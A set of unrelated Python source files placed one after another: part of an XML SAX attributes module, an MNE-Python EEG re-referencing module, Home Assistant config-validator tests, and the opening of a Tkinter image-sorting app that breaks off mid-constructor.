def has_key(self, name):
return name in self._attrs
def __contains__(self, name):
return name in self._attrs
def get(self, name, alternative=None):
return self._attrs.get(name, alternative)
def copy(self):
return self.__class__(self._attrs)
def items(self):
return self._attrs.items()
def values(self):
return self._attrs.values()
class AttributesNSImpl(AttributesImpl):
def __init__(self, attrs, qnames):
"""NS-aware implementation.
attrs should be of the form {(ns_uri, lname): value, ...}.
qnames of the form {(ns_uri, lname): qname, ...}."""
self._attrs = attrs
self._qnames = qnames
def getValueByQName(self, name):
for nsname, qname in self._qnames.items():
if qname == name:
return self._attrs[nsname]
raise KeyError, name
def getNameByQName(self, name):
for nsname, qname in self._qnames.items():
if qname == name:
return nsname
raise KeyError, name
def getQNameByName(self, name):
return self._qnames[name]
def getQNames(self):
return self._qnames.values()
def copy(self):
return self.__class__(self._attrs, self._qnames)
def _test():
XMLReader()
IncrementalParser()
Locator()
if __name__ == '__main__':
_test()
|
|
# Authors: Marijn van Vliet <w.m.vanvliet@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD-3-Clause
import numpy as np
from .constants import FIFF
from .meas_info import _check_ch_keys
from .proj import _has_eeg_average_ref_proj, make_eeg_average_ref_proj
from .proj import setup_proj
from .pick import pick_types, pick_channels, pick_channels_forward
from .base import BaseRaw
from ..evoked import Evoked
from ..epochs import BaseEpochs
from ..fixes import pinv
from ..utils import (logger, warn, verbose, _validate_type, _check_preload,
_check_option, fill_doc)
from ..defaults import DEFAULTS
def _copy_channel(inst, ch_name, new_ch_name):
"""Add a copy of a channel specified by ch_name.
Input data can be in the form of Raw, Epochs or Evoked.
The instance object is modified inplace.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Data containing the EEG channels
ch_name : str
Name of the channel to copy.
new_ch_name : str
Name given to the copy of the channel.
Returns
-------
inst : instance of Raw | Epochs | Evoked
The data with a copy of a given channel.
"""
new_inst = inst.copy().pick_channels([ch_name])
new_inst.rename_channels({ch_name: new_ch_name})
inst.add_channels([new_inst], force_update_info=True)
return inst
def _check_before_reference(inst, ref_from, ref_to, ch_type):
"""Prepare instance for referencing."""
# Check to see that data is preloaded
_check_preload(inst, "Applying a reference")
ch_type = _get_ch_type(inst, ch_type)
ch_dict = {**{type_: True for type_ in ch_type},
'meg': False, 'ref_meg': False}
eeg_idx = pick_types(inst.info, **ch_dict)
if ref_to is None:
ref_to = [inst.ch_names[i] for i in eeg_idx]
extra = 'EEG channels found'
else:
extra = 'channels supplied'
if len(ref_to) == 0:
raise ValueError('No %s to apply the reference to' % (extra,))
# After referencing, existing SSPs might not be valid anymore.
projs_to_remove = []
for i, proj in enumerate(inst.info['projs']):
# Remove any average reference projections
if proj['desc'] == 'Average EEG reference' or \
proj['kind'] == FIFF.FIFFV_PROJ_ITEM_EEG_AVREF:
logger.info('Removing existing average EEG reference '
'projection.')
# Don't remove the projection right away, but do this at the end of
# this loop.
projs_to_remove.append(i)
# Inactive SSPs may block re-referencing
elif (not proj['active'] and
len([ch for ch in (ref_from + ref_to)
if ch in proj['data']['col_names']]) > 0):
raise RuntimeError(
'Inactive signal space projection (SSP) operators are '
'present that operate on sensors involved in the desired '
'referencing scheme. These projectors need to be applied '
'using the apply_proj() method function before the desired '
'reference can be set.'
)
for i in projs_to_remove:
del inst.info['projs'][i]
# Need to call setup_proj after changing the projs:
inst._projector, _ = \
setup_proj(inst.info, add_eeg_ref=False, activate=False)
# If the reference touches EEG/ECoG/sEEG/DBS electrodes, note in the
# info that a non-CAR has been applied.
ref_to_channels = pick_channels(inst.ch_names, ref_to, ordered=True)
if len(np.intersect1d(ref_to_channels, eeg_idx)) > 0:
with inst.info._unlock():
inst.info['custom_ref_applied'] = FIFF.FIFFV_MNE_CUSTOM_REF_ON
return ref_to
def _apply_reference(inst, ref_from, ref_to=None, forward=None,
ch_type='auto'):
"""Apply a custom EEG referencing scheme."""
ref_to = _check_before_reference(inst, ref_from, ref_to, ch_type)
# Compute reference
if len(ref_from) > 0:
# this is guaranteed below, but we should avoid the crazy pick_channels
# behavior that [] gives all. Also use ordered=True just to make sure
# that all supplied channels actually exist.
assert len(ref_to) > 0
ref_names = ref_from
ref_from = pick_channels(inst.ch_names, ref_from, ordered=True)
ref_to = pick_channels(inst.ch_names, ref_to, ordered=True)
data = inst._data
ref_data = data[..., ref_from, :].mean(-2, keepdims=True)
data[..., ref_to, :] -= ref_data
ref_data = ref_data[..., 0, :]
# REST
if forward is not None:
# use ch_sel and the given forward
forward = pick_channels_forward(forward, ref_names, ordered=True)
# 1-3. Compute a forward (G) and avg-ref'ed data (done above)
G = forward['sol']['data']
assert G.shape[0] == len(ref_names)
# 4. Compute the forward (G) and average-reference it (Ga):
Ga = G - np.mean(G, axis=0, keepdims=True)
# 5. Compute the Ga_inv by SVD
Ga_inv = pinv(Ga, rtol=1e-6)
# 6. Compute Ra = (G @ Ga_inv) in eq (8) from G and Ga_inv
Ra = G @ Ga_inv
# 7-8. Compute Vp = Ra @ Va; then Vpa=average(Vp)
Vpa = np.mean(Ra @ data[..., ref_from, :], axis=-2, keepdims=True)
data[..., ref_to, :] += Vpa
else:
ref_data = None
return inst, ref_data
@fill_doc
def add_reference_channels(inst, ref_channels, copy=True):
"""Add reference channels to data that consists of all zeros.
Adds reference channels to data that were not included during recording.
This is useful when you need to re-reference your data to different
channels. These added channels will consist of all zeros.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Instance of Raw or Epochs with EEG channels and reference channel(s).
%(ref_channels)s
copy : bool
Specifies whether the data will be copied (True) or modified in-place
(False). Defaults to True.
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with added EEG reference channels.
"""
# Check to see that data is preloaded
_check_preload(inst, 'add_reference_channels')
_validate_type(ref_channels, (list, tuple, str), 'ref_channels')
if isinstance(ref_channels, str):
ref_channels = [ref_channels]
for ch in ref_channels:
if ch in inst.info['ch_names']:
raise ValueError("Channel %s already specified in inst." % ch)
# Once CAR is applied (active), don't allow adding channels
if _has_eeg_average_ref_proj(inst.info['projs'], check_active=True):
raise RuntimeError('Average reference already applied to data.')
if copy:
inst = inst.copy()
if isinstance(inst, (BaseRaw, Evoked)):
data = inst._data
refs = np.zeros((len(ref_channels), data.shape[1]))
data = np.vstack((data, refs))
inst._data = data
elif isinstance(inst, BaseEpochs):
data = inst._data
x, y, z = data.shape
refs = np.zeros((x * len(ref_channels), z))
data = np.vstack((data.reshape((x * y, z), order='F'), refs))
data = data.reshape(x, y + len(ref_channels), z, order='F')
inst._data = data
else:
raise TypeError("inst should be Raw, Epochs, or Evoked instead of %s."
% type(inst))
nchan = len(inst.info['ch_names'])
# only do this if we actually have digitisation points
if inst.info.get('dig', None) is not None:
# "zeroth" EEG electrode dig points is reference
ref_dig_loc = [dl for dl in inst.info['dig'] if (
dl['kind'] == FIFF.FIFFV_POINT_EEG and
dl['ident'] == 0)]
if len(ref_channels) > 1 or len(ref_dig_loc) != len(ref_channels):
ref_dig_array = np.full(12, np.nan)
warn('The locations of multiple reference channels are ignored.')
else: # n_ref_channels == 1 and a single ref digitization exists
ref_dig_array = np.concatenate((ref_dig_loc[0]['r'],
ref_dig_loc[0]['r'], np.zeros(6)))
# Replace the (possibly new) Ref location for each channel
for idx in pick_types(inst.info, meg=False, eeg=True, exclude=[]):
inst.info['chs'][idx]['loc'][3:6] = ref_dig_loc[0]['r']
else:
# Ideally we'd fall back on getting the location from a montage, but
# locations for non-present channels aren't stored, so location is
# unknown. Users can call set_montage() again if needed.
ref_dig_array = np.full(12, np.nan)
logger.info('Location for this channel is unknown; consider calling '
'set_montage() again if needed.')
for ch in ref_channels:
chan_info = {'ch_name': ch,
'coil_type': FIFF.FIFFV_COIL_EEG,
'kind': FIFF.FIFFV_EEG_CH,
'logno': nchan + 1,
'scanno': nchan + 1,
'cal': 1,
'range': 1.,
'unit_mul': 0.,
'unit': FIFF.FIFF_UNIT_V,
'coord_frame': FIFF.FIFFV_COORD_HEAD,
'loc': ref_dig_array}
inst.info['chs'].append(chan_info)
inst.info._update_redundant()
if isinstance(inst, BaseRaw):
inst._cals = np.hstack((inst._cals, [1] * len(ref_channels)))
range_ = np.arange(1, len(ref_channels) + 1)
for pi, picks in enumerate(inst._read_picks):
inst._read_picks[pi] = np.concatenate(
[picks, np.max(picks) + range_])
inst.info._check_consistency()
set_eeg_reference(inst, ref_channels=ref_channels, copy=False,
verbose=False)
return inst
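# Usage sketch (illustrative; `raw` is assumed to be a preloaded Raw instance
# and 'FCz' a hypothetical reference channel name):
#
#   raw = add_reference_channels(raw, ['FCz'])
#
# The added channel holds zeros until a different reference is applied.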
_ref_dict = {
FIFF.FIFFV_MNE_CUSTOM_REF_ON: 'on',
FIFF.FIFFV_MNE_CUSTOM_REF_OFF: 'off',
FIFF.FIFFV_MNE_CUSTOM_REF_CSD: 'CSD',
}
def _check_can_reref(inst):
_validate_type(inst, (BaseRaw, BaseEpochs, Evoked), "Instance")
current_custom = inst.info['custom_ref_applied']
if current_custom not in (FIFF.FIFFV_MNE_CUSTOM_REF_ON,
FIFF.FIFFV_MNE_CUSTOM_REF_OFF):
raise RuntimeError('Cannot set new reference on data with custom '
'reference type %r' % (_ref_dict[current_custom],))
@verbose
def set_eeg_reference(inst, ref_channels='average', copy=True,
projection=False, ch_type='auto', forward=None,
verbose=None):
"""Specify which reference to use for EEG data.
Use this function to explicitly specify the desired reference for EEG.
This can be either an existing electrode or a new virtual channel.
This function will re-reference the data according to the desired
reference.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Instance of Raw or Epochs with EEG channels and reference channel(s).
%(ref_channels_set_eeg_reference)s
copy : bool
Specifies whether the data will be copied (True) or modified in-place
(False). Defaults to True.
%(projection_set_eeg_reference)s
%(ch_type_set_eeg_reference)s
%(forward_set_eeg_reference)s
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'`` and
``projection=True`` a projection will be added instead of directly
re-referencing the data.
ref_data : array
Array of reference data subtracted from EEG channels. This will be
``None`` if ``projection=True`` or ``ref_channels='REST'``.
%(set_eeg_reference_see_also_notes)s
"""
from ..forward import Forward
_check_can_reref(inst)
if projection: # average reference projector
if ref_channels != 'average':
raise ValueError('Setting projection=True is only supported for '
'ref_channels="average", got %r.'
% (ref_channels,))
if _has_eeg_average_ref_proj(inst.info['projs']):
warn('An average reference projection was already added. The data '
'has been left untouched.')
else:
# Creating an average reference may fail. In this case, make
# sure that the custom_ref_applied flag is left untouched.
custom_ref_applied = inst.info['custom_ref_applied']
try:
with inst.info._unlock():
inst.info['custom_ref_applied'] = \
FIFF.FIFFV_MNE_CUSTOM_REF_OFF
inst.add_proj(make_eeg_average_ref_proj(inst.info,
activate=False))
except Exception:
with inst.info._unlock():
inst.info['custom_ref_applied'] = custom_ref_applied
raise
# If the data has been preloaded, projections will no
# longer be automatically applied.
if inst.preload:
logger.info('Average reference projection was added, '
'but has not been applied yet. Use the '
'apply_proj method to apply it.')
return inst, None
del projection # not used anymore
inst = inst.copy() if copy else inst
ch_type = _get_ch_type(inst, ch_type)
ch_dict = {**{type_: True for type_ in ch_type},
'meg': False, 'ref_meg': False}
ch_sel = [inst.ch_names[i] for i in pick_types(inst.info, **ch_dict)]
if ref_channels == 'REST':
_validate_type(forward, Forward, 'forward when ref_channels="REST"')
else:
forward = None # signal to _apply_reference not to do REST
if ref_channels in ('average', 'REST'):
logger.info(f'Applying {ref_channels} reference.')
ref_channels = ch_sel
if ref_channels == []:
logger.info('EEG data marked as already having the desired reference.')
else:
logger.info(
'Applying a custom '
f"{tuple(DEFAULTS['titles'][type_] for type_ in ch_type)} "
'reference.')
return _apply_reference(inst, ref_channels, ch_sel, forward,
ch_type=ch_type)
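# Usage sketch (illustrative; `raw` and `fwd` are assumed to be a preloaded
# Raw instance and a Forward solution, and the channel name is hypothetical):
#
#   raw_avg, _ = set_eeg_reference(raw.copy(), ref_channels='average')
#   raw_m1, ref_data = set_eeg_reference(raw.copy(), ref_channels=['EEG 010'])
#   raw_rest, _ = set_eeg_reference(raw.copy(), ref_channels='REST', forward=fwd)
#
# With projection=True and ref_channels='average', a projector is added
# instead of re-referencing the data directly.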
def _get_ch_type(inst, ch_type):
_validate_type(ch_type, (str, list, tuple), 'ch_type')
valid_ch_types = ('auto', 'eeg', 'ecog', 'seeg', 'dbs')
if isinstance(ch_type, str):
_check_option('ch_type', ch_type, valid_ch_types)
if ch_type != 'auto':
ch_type = [ch_type]
elif isinstance(ch_type, (list, tuple)):
for type_ in ch_type:
_validate_type(type_, str, 'ch_type')
_check_option('ch_type', type_, valid_ch_types[1:])
ch_type = list(ch_type)
# if ch_type is 'auto', search through list to find first reasonable
# reference-able channel type.
if ch_type == 'auto':
for type_ in ['eeg', 'ecog', 'seeg', 'dbs']:
if type_ in inst:
ch_type = [type_]
logger.info('%s channel type selected for '
're-referencing' % DEFAULTS['titles'][type_])
break
# if auto comes up empty, or the user specifies a bad ch_type.
else:
raise ValueError('No EEG, ECoG, sEEG or DBS channels found '
'to rereference.')
return ch_type
@verbose
def set_bipolar_reference(inst, anode, cathode, ch_name=None, ch_info=None,
drop_refs=True, copy=True, verbose=None):
"""Re-reference selected channels using a bipolar referencing scheme.
A bipolar reference takes the difference between two channels (the anode
minus the cathode) and adds it as a new virtual channel. The original
channels will be dropped by default.
Multiple anodes and cathodes can be specified, in which case multiple
virtual channels will be created. The 1st cathode will be subtracted
from the 1st anode, the 2nd cathode from the 2nd anode, etc.
By default, the virtual channels will be annotated with channel-info and
-location of the anodes and coil types will be set to EEG_BIPOLAR.
Parameters
----------
inst : instance of Raw | Epochs | Evoked
Data containing the unreferenced channels.
anode : str | list of str
The name(s) of the channel(s) to use as anode in the bipolar reference.
cathode : str | list of str
The name(s) of the channel(s) to use as cathode in the bipolar
reference.
ch_name : str | list of str | None
The channel name(s) for the virtual channel(s) containing the resulting
signal. By default, bipolar channels are named after the anode and
cathode, but it is recommended to supply a more meaningful name.
ch_info : dict | list of dict | None
This parameter can be used to supply a dictionary (or a dictionary for
each bipolar channel) containing channel information to merge in,
overwriting the default values. Defaults to None.
drop_refs : bool
Whether to drop the anode/cathode channels from the instance.
copy : bool
Whether to operate on a copy of the data (True) or modify it in-place
(False). Defaults to True.
%(verbose)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with the specified channels re-referenced.
See Also
--------
set_eeg_reference : Convenience function for creating an EEG reference.
Notes
-----
1. If the anodes contain any EEG channels, this function removes
any pre-existing average reference projections.
2. During source localization, the EEG signal should have an average
reference.
3. The data must be preloaded.
.. versionadded:: 0.9.0
"""
from .meas_info import create_info
from ..io import RawArray
from ..epochs import EpochsArray
from ..evoked import EvokedArray
_check_can_reref(inst)
if not isinstance(anode, list):
anode = [anode]
if not isinstance(cathode, list):
cathode = [cathode]
if len(anode) != len(cathode):
raise ValueError('Number of anodes (got %d) must equal the number '
'of cathodes (got %d).' % (len(anode), len(cathode)))
if ch_name is None:
ch_name = [f'{a}-{c}' for (a, c) in zip(anode, cathode)]
elif not isinstance(ch_name, list):
ch_name = [ch_name]
if len(ch_name) != len(anode):
raise ValueError('Number of channel names must equal the number of '
'anodes/cathodes (got %d).' % len(ch_name))
# Check for duplicate channel names (it is allowed to give the name of the
# anode or cathode channel, as they will be replaced).
for ch, a, c in zip(ch_name, anode, cathode):
if ch not in [a, c] and ch in inst.ch_names:
raise ValueError('There is already a channel named "%s", please '
'specify a different name for the bipolar '
'channel using the ch_name parameter.' % ch)
if ch_info is None:
ch_info = [{} for _ in anode]
elif not isinstance(ch_info, list):
ch_info = [ch_info]
if len(ch_info) != len(anode):
raise ValueError('Number of channel info dictionaries must equal the '
'number of anodes/cathodes.')
if copy:
inst = inst.copy()
anode = _check_before_reference(inst, ref_from=cathode,
ref_to=anode, ch_type='auto')
# Create bipolar reference channels by multiplying the data
# (channels x time) with a matrix (n_virtual_channels x channels)
# and add them to the instance.
multiplier = np.zeros((len(anode), len(inst.ch_names)))
for idx, (a, c) in enumerate(zip(anode, cathode)):
multiplier[idx, inst.ch_names.index(a)] = 1
multiplier[idx, inst.ch_names.index(c)] = -1
ref_info = create_info(ch_names=ch_name, sfreq=inst.info['sfreq'],
ch_types=inst.get_channel_types(picks=anode))
# Update "chs" in Reference-Info.
for ch_idx, (an, info) in enumerate(zip(anode, ch_info)):
_check_ch_keys(info, ch_idx, name='ch_info', check_min=False)
an_idx = inst.ch_names.index(an)
# Copy everything from anode (except ch_name).
an_chs = {k: v for k, v in inst.info['chs'][an_idx].items()
if k != 'ch_name'}
ref_info['chs'][ch_idx].update(an_chs)
# Set coil-type to bipolar.
ref_info['chs'][ch_idx]['coil_type'] = FIFF.FIFFV_COIL_EEG_BIPOLAR
# Update with info from ch_info-parameter.
ref_info['chs'][ch_idx].update(info)
# Set other info-keys from original instance.
pick_info = {k: v for k, v in inst.info.items() if k not in
['chs', 'ch_names', 'bads', 'nchan', 'sfreq']}
with ref_info._unlock():
ref_info.update(pick_info)
# Rereferencing of data.
ref_data = multiplier @ inst._data
if isinstance(inst, BaseRaw):
ref_inst = RawArray(ref_data, ref_info, first_samp=inst.first_samp,
copy=None)
elif isinstance(inst, BaseEpochs):
ref_inst = EpochsArray(ref_data, ref_info, events=inst.events,
tmin=inst.tmin, event_id=inst.event_id,
metadata=inst.metadata)
else:
ref_inst = EvokedArray(ref_data, ref_info, tmin=inst.tmin,
comment=inst.comment, nave=inst.nave,
kind='average')
# Add referenced instance to original instance.
inst.add_channels([ref_inst], force_update_info=True)
added_channels = ', '.join(ch_name)
logger.info(f'Added the following bipolar channels:\n{added_channels}')
for attr_name in ['picks', '_projector']:
setattr(inst, attr_name, None)
# Drop remaining channels.
if drop_refs:
drop_channels = list((set(anode) | set(cathode)) & set(inst.ch_names))
inst.drop_channels(drop_channels)
return inst
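# Usage sketch (illustrative; channel names are hypothetical):
#
#   raw_bip = set_bipolar_reference(raw, anode='EEG 001', cathode='EEG 002',
#                                   ch_name='EEG 001-002')
#
# Anodes and cathodes may also be given as equal-length lists to create
# several virtual channels at once; the original channels are dropped unless
# drop_refs=False is passed.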
|
|
"""Test config validators."""
from datetime import timedelta, datetime, date
import enum
import os
from socket import _GLOBAL_DEFAULT_TIMEOUT
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
def test_boolean():
"""Test boolean validation."""
schema = vol.Schema(cv.boolean)
for value in ('T', 'negative', 'lock'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('true', 'On', '1', 'YES', 'enable', 1, True):
assert schema(value)
for value in ('false', 'Off', '0', 'NO', 'disable', 0, False):
assert not schema(value)
def test_latitude():
"""Test latitude validation."""
schema = vol.Schema(cv.latitude)
for value in ('invalid', None, -91, 91, '-91', '91', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-89', 89, '12.34'):
schema(value)
def test_longitude():
"""Test longitude validation."""
schema = vol.Schema(cv.longitude)
for value in ('invalid', None, -181, 181, '-181', '181', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-179', 179, '12.34'):
schema(value)
def test_port():
"""Test TCP/UDP network port."""
schema = vol.Schema(cv.port)
for value in ('invalid', None, -1, 0, 80000, '81000'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('1000', 21, 24574):
schema(value)
def test_isfile():
"""Validate that the value is an existing file."""
schema = vol.Schema(cv.isfile)
fake_file = 'this-file-does-not.exist'
assert not os.path.isfile(fake_file)
for value in ('invalid', None, -1, 0, 80000, fake_file):
with pytest.raises(vol.Invalid):
schema(value)
# patching methods that allow us to fake a file existing
# with write access
with patch('os.path.isfile', Mock(return_value=True)), \
patch('os.access', Mock(return_value=True)):
schema('test.txt')
def test_url():
"""Test URL."""
schema = vol.Schema(cv.url)
for value in ('invalid', None, 100, 'htp://ha.io', 'http//ha.io',
'http://??,**', 'https://??,**'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('http://localhost', 'https://localhost/test/index.html',
'http://home-assistant.io', 'http://home-assistant.io/test/',
'https://community.home-assistant.io/'):
assert schema(value)
def test_platform_config():
"""Test platform config validation."""
options = (
{},
{'hello': 'world'},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.PLATFORM_SCHEMA(value)
options = (
{'platform': 'mqtt'},
{'platform': 'mqtt', 'beer': 'yes'},
)
for value in options:
cv.PLATFORM_SCHEMA(value)
def test_ensure_list():
"""Test ensure_list."""
schema = vol.Schema(cv.ensure_list)
assert [] == schema(None)
assert [1] == schema(1)
assert [1] == schema([1])
assert ['1'] == schema('1')
assert ['1'] == schema(['1'])
assert [{'1': '2'}] == schema({'1': '2'})
def test_entity_id():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_id)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_entity')
assert schema('sensor.LIGHT') == 'sensor.light'
def test_entity_ids():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_ids)
options = (
'invalid_entity',
'sensor.light,sensor_invalid',
['invalid_entity'],
['sensor.light', 'sensor_invalid'],
['sensor.light,sensor_invalid'],
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
[],
['sensor.light'],
'sensor.light'
)
for value in options:
schema(value)
assert schema('sensor.LIGHT, light.kitchen ') == [
'sensor.light', 'light.kitchen'
]
def test_entity_domain():
"""Test entity domain validation."""
schema = vol.Schema(cv.entity_domain('sensor'))
options = (
'invalid_entity',
'cover.demo',
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
print(value)
schema(value)
assert schema('sensor.LIGHT') == 'sensor.light'
def test_entities_domain():
"""Test entities domain validation."""
schema = vol.Schema(cv.entities_domain('sensor'))
options = (
None,
'',
'invalid_entity',
['sensor.light', 'cover.demo'],
['sensor.light', 'sensor_invalid'],
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
'sensor.light',
['SENSOR.light'],
['sensor.light', 'sensor.demo']
)
for value in options:
schema(value)
assert schema('sensor.LIGHT, sensor.demo ') == [
'sensor.light', 'sensor.demo'
]
assert schema(['sensor.light', 'SENSOR.demo']) == [
'sensor.light', 'sensor.demo'
]
def test_ensure_list_csv():
"""Test ensure_list_csv."""
schema = vol.Schema(cv.ensure_list_csv)
options = (
None,
12,
[],
['string'],
'string1,string2'
)
for value in options:
schema(value)
assert schema('string1, string2 ') == [
'string1', 'string2'
]
def test_event_schema():
"""Test event_schema validation."""
options = (
{}, None,
{
'event_data': {},
},
{
'event': 'state_changed',
'event_data': 1,
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.EVENT_SCHEMA(value)
options = (
{'event': 'state_changed'},
{'event': 'state_changed', 'event_data': {'hello': 'world'}},
)
for value in options:
cv.EVENT_SCHEMA(value)
def test_icon():
"""Test icon validation."""
schema = vol.Schema(cv.icon)
for value in (False, 'work', 'icon:work'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema('mdi:work')
def test_time_period():
"""Test time_period validation."""
schema = vol.Schema(cv.time_period)
options = (
None, '', 'hello:world', '12:', '12:34:56:78',
{}, {'wrong_key': -10}
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
'8:20', '23:59', '-8:20', '-23:59:59', '-48:00', {'minutes': 5}, 1, '5'
)
for value in options:
schema(value)
assert timedelta(seconds=180) == schema('180')
assert timedelta(hours=23, minutes=59) == schema('23:59')
assert -1 * timedelta(hours=1, minutes=15) == schema('-1:15')
def test_service():
"""Test service validation."""
schema = vol.Schema(cv.service)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_turn_on')
schema('homeassistant.turn_on')
def test_service_schema():
"""Test service_schema validation."""
options = (
{}, None,
{
'service': 'homeassistant.turn_on',
'service_template': 'homeassistant.turn_on'
},
{
'data': {'entity_id': 'light.kitchen'},
},
{
'service': 'homeassistant.turn_on',
'data': None
},
{
'service': 'homeassistant.turn_on',
'data_template': {
'brightness': '{{ no_end'
}
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.SERVICE_SCHEMA(value)
options = (
{'service': 'homeassistant.turn_on'},
{
'service': 'homeassistant.turn_on',
'entity_id': 'light.kitchen',
},
{
'service': 'homeassistant.turn_on',
'entity_id': ['light.kitchen', 'light.ceiling'],
},
)
for value in options:
cv.SERVICE_SCHEMA(value)
def test_slug():
"""Test slug validation."""
schema = vol.Schema(cv.slug)
for value in (None, 'hello world'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in (12345, 'hello'):
schema(value)
def test_string():
"""Test string validation."""
schema = vol.Schema(cv.string)
with pytest.raises(vol.Invalid):
schema(None)
with pytest.raises(vol.Invalid):
schema([])
with pytest.raises(vol.Invalid):
schema({})
for value in (True, 1, 'hello'):
schema(value)
def test_temperature_unit():
"""Test temperature unit validation."""
schema = vol.Schema(cv.temperature_unit)
with pytest.raises(vol.MultipleInvalid):
schema('K')
schema('C')
schema('F')
def test_x10_address():
"""Test x10 addr validator."""
schema = vol.Schema(cv.x10_address)
with pytest.raises(vol.Invalid):
schema('Q1')
schema('q55')
schema('garbage_addr')
schema('a1')
schema('C11')
def test_template():
"""Test template validator."""
schema = vol.Schema(cv.template)
for value in (None, '{{ partial_print }', '{% if True %}Hello', ['test']):
with pytest.raises(vol.Invalid,
message='{} not considered invalid'.format(value)):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
)
for value in options:
schema(value)
def test_template_complex():
"""Test template_complex validator."""
schema = vol.Schema(cv.template_complex)
for value in (None, '{{ partial_print }', '{% if True %}Hello'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
{'test': 1, 'test2': '{{ beer }}'},
['{{ beer }}', 1]
)
for value in options:
schema(value)
def test_time_zone():
"""Test time zone validation."""
schema = vol.Schema(cv.time_zone)
with pytest.raises(vol.MultipleInvalid):
schema('America/Do_Not_Exist')
schema('America/Los_Angeles')
schema('UTC')
def test_date():
"""Test date validation."""
schema = vol.Schema(cv.date)
for value in ['Not a date', '23:42', '2016-11-23T18:59:08']:
with pytest.raises(vol.Invalid):
schema(value)
schema(datetime.now().date())
schema('2016-11-23')
def test_time():
"""Test date validation."""
schema = vol.Schema(cv.time)
for value in ['Not a time', '2016-11-23', '2016-11-23T18:59:08']:
with pytest.raises(vol.Invalid):
schema(value)
schema(datetime.now().time())
schema('23:42:00')
schema('23:42')
def test_datetime():
"""Test date time validation."""
schema = vol.Schema(cv.datetime)
for value in [date.today(), 'Wrong DateTime', '2016-11-23']:
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema(datetime.now())
schema('2016-11-23T18:59:08')
def test_deprecated(caplog):
"""Test deprecation log."""
schema = vol.Schema({
'venus': cv.boolean,
'mars': cv.boolean
})
deprecated_schema = vol.All(
cv.deprecated('mars'),
schema
)
deprecated_schema({'venus': True})
# pylint: disable=len-as-condition
assert len(caplog.records) == 0
deprecated_schema({'mars': True})
assert len(caplog.records) == 1
assert caplog.records[0].name == __name__
assert ("The 'mars' option (with value 'True') is deprecated, "
"please remove it from your configuration.") in caplog.text
def test_key_dependency():
"""Test key_dependency validator."""
schema = vol.Schema(cv.key_dependency('beer', 'soda'))
options = (
{'beer': None},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
{'beer': None, 'soda': None},
{'soda': None}, {}
)
for value in options:
schema(value)
def test_has_at_least_one_key():
"""Test has_at_least_one_key validator."""
schema = vol.Schema(cv.has_at_least_one_key('beer', 'soda'))
for value in (None, [], {}, {'wine': None}):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ({'beer': None}, {'soda': None}):
schema(value)
def test_enum():
"""Test enum validator."""
class TestEnum(enum.Enum):
"""Test enum."""
value1 = "Value 1"
value2 = "Value 2"
schema = vol.Schema(cv.enum(TestEnum))
with pytest.raises(vol.Invalid):
schema('value3')
def test_socket_timeout(): # pylint: disable=invalid-name
"""Test socket timeout validator."""
schema = vol.Schema(cv.socket_timeout)
with pytest.raises(vol.Invalid):
schema(0.0)
with pytest.raises(vol.Invalid):
schema(-1)
assert _GLOBAL_DEFAULT_TIMEOUT == schema(None)
assert schema(1) == 1.0
def test_matches_regex():
"""Test matches_regex validator."""
schema = vol.Schema(cv.matches_regex('.*uiae.*'))
with pytest.raises(vol.Invalid):
schema(1.0)
with pytest.raises(vol.Invalid):
schema(" nrtd ")
test_str = "This is a test including uiae."
assert(schema(test_str) == test_str)
def test_is_regex():
"""Test the is_regex validator."""
schema = vol.Schema(cv.is_regex)
with pytest.raises(vol.Invalid):
schema("(")
with pytest.raises(vol.Invalid):
schema({"a dict": "is not a regex"})
valid_re = ".*"
schema(valid_re)
def test_comp_entity_ids():
"""Test config validation for component entity IDs."""
schema = vol.Schema(cv.comp_entity_ids)
for valid in ('ALL', 'all', 'AlL', 'light.kitchen', ['light.kitchen'],
['light.kitchen', 'light.ceiling'], []):
schema(valid)
for invalid in (['light.kitchen', 'not-entity-id'], '*', ''):
with pytest.raises(vol.Invalid):
schema(invalid)
|
|
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import tkMessageBox
except ImportError:
from tkinter import messagebox as tkMessageBox
try:
import tkFileDialog
except ImportError:
from tkinter import filedialog as tkFileDialog
import os
from PIL import Image, ImageTk
class App:
def __init__(self, master):
# Set NULL references to image & label objects at APP init
self.curimage = None
self.oldimlabel = None
self.oldtxtlabel = None
self.curimgidx = 0
# Initialize empty lists to denote loaded, selected, rejected images
self.loaded = []
self.selected = []
self.rejected = []
self.tentative = []
